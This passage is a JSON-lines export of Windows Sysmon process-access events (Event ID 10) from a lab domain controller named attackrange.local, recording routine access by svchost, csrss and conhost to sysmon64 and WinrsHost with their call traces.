{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5357,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5358,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5359,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5360,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5361,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5362,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.031\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nTargetProcessId: 660\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.031","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","TargetProcessId":"660","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5363,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.031\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-001016A60700}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.031","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-001016A60700}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5364,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-0010FC520A00}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-0010FC520A00}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5365,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nSourceProcessId: 1332\r\nSourceThreadId: 1788\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-0010FC520A00}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 